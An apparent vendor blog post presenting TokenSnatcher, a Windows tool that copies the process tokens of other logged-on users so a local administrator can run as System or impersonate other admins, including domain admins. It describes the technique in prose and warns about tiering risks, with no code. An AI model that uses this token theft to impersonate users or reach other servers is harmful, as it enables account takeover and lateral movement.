Do you sometimes run into situations where being Administrator just doesn’t cut it?
- Trying to access hidden registry keys?
- Trying to remove the godforsaken c:\windows\csc folder?
- Trying to stop a service just to get access denied?
- etc. etc. etc.
One obvious solution would be to elevate your own credentials to System credentials. Running a process as System will allow you to do pretty much anything on the system (so take care!).
Most people facing this challenge will revert to PSexec.exe from Microsoft (formerly Sysinternals).
Here at Easy365Manager we have tremendous admiration for Mark Russinovich, the creator of PSexec. Contrary to TokenSnatcher the PSexec tool is very well tested and we highly recommend using that tool whenever possible.
However, PSexec does leave a footprint which includes the installation of a Windows service on your system. In some cases that may not be desired or possible.
Also, maybe you want to be someone other than System? With TokenSnatcher you can become anyone “dumb enough” to run a process on your system!
How Does TokenSnatcher Work?
TokenSnatcher is a pure executable that doesn’t install anything. It uses your Administrator credentials (you must have local system admin rights in order to run it) to scan all processes running on your system.
After scanning the processes TokenSnatcher will present you with a list of all the identities running processes on your system:
Simply type the number of the process token (the identity) you want to snatch, and TokenSnatcher will spawn a new command prompt running as the selected identity.
To confirm your new identity in the spawned command prompt you can use Whoami /all. In the below output you can see that I chose to copy the token of a process running as System:
As seen in the output the process is now running as System.
Any program you start from the new command prompt will inherit the selected identity. If you e.g. start RegEdit you will now have RegEdit running as system which will reveal hidden registry keys not visible to the local administrator account.
Warning! Privilege Escalation
One thing to notice is that TokenSnatcher will allow you to steal ANY identity (token) running a process on your system. This includes the identities of your fellow administrators:
On the system where I’m running TokenSnatcher you can see that Jolene is running PowerShell, Joe is running an MMC (in this case AD Users & Computers) and Jill is running a command prompt.
I can now steal their credentials simply (and only) because I am local system administrator (nothing else is required).
Wait!!! Does that mean:
- Can you steal the identity of a domain admin? YES
- Can the stolen credentials be used to mess around in Active Directory? YES
- Can you access other servers remotely using the stolen identity? YES
Oh my … ! Really scary stuff!!!
If you think about it for a few seconds you will understand why you NEVER EVER should allow a lower level administrator to be local system administrator on a system where higher level administrators (or services) are running programs.
This aspect of Windows security is often overlooked!
It takes a lot of thoughtful planning to avoid exposing your admins from identify theft in a large complex network!
FYI, TokenSnatcher only uses standard, publicly available Windows API calls. Creatively? For sure! But no funny stuff or undocumented exploits are going on here.
Technical Deep Dive
If you really would like to dive down into the technicalities of TokenSnatcher, process tokens and security identity inheritance have a look at this video:
The video has a technical walkthrough of the theory behind privilege escalation on the Windows operating system.
After the theory you’ll find a demo of TokenSnatcher. Click here to go directly to the demo.
The information in the video should make nice input for your next security team meeting! 😉
Please make sure to read and understand all of the above information before downloading and running TokenSnatcher.
Disclaimer: The software featured in this post is provided as-is. Use entirely at your own discretion.